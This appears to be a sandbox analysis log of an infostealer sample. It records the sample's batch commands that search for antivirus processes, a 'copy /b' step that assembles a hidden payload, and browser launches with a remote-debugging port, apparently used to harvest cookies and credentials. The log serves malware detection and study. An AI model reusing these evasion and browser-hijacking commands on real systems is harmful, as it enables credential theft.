            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: String function: 004062CF appears 57 times
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: String function: 00CFFD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: String function: 00D00DA0 appears 46 times
            Source: nB52P46OJD.exeStatic PE information: invalid certificate
            Source: nB52P46OJD.exe, 00000000.00000002.1402250119.0000000000980000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs nB52P46OJD.exe
            Source: nB52P46OJD.exe, 00000000.00000003.1400977837.0000000000980000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs nB52P46OJD.exe
            Source: nB52P46OJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RIMOH4.11.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@82/299@21/15
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D541FA GetLastError,FormatMessageW,11_2_00D541FA
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D42010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00D42010
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41A0B AdjustTokenPrivileges,CloseHandle,11_2_00D41A0B
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00D4DD87
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D53A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00D53A0E
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ZWG5VOTQ.htmJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile created: C:\Users\user\AppData\Local\Temp\nsa8BAE.tmpJump to behavior
            Source: nB52P46OJD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: TRQIE37YC.11.dr, XBS2D2V3W.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: nB52P46OJD.exeReversingLabs: Detection: 18%
            Source: nB52P46OJD.exeString found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile read: C:\Users\user\Desktop\nB52P46OJD.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\nB52P46OJD.exe "C:\Users\user\Desktop\nB52P46OJD.exe"
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm wJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com wJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dbghelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
